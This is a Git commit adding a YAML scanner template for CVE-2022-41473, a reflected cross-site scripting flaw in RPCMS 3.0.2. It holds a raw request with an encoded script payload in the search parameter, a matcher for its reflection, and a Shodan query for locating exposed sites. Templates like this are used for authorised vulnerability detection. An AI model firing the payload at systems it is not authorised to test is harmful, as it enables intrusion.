Create CVE-2022-41473.yaml

patch-1
Arafat Ansari 2022-10-17 10:21:54 +05:30 committed by GitHub
parent c94829f1fd
commit e8e6dfc13b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2022-41473
info:
name: RPCMS 3.0.2 - Cross-site scripting (XSS)
author: arafatansari
severity: medium
description: |
RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function.
reference:
- https://github.com/ralap-z/rpcms/issues/1
metadata:
shodan-query: http.html:"RPCMS"
verified: "true"
tags: xss,cve,2022
requests:
- raw:
- |
GET /search/?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(document.cookie)</script>"
condition: and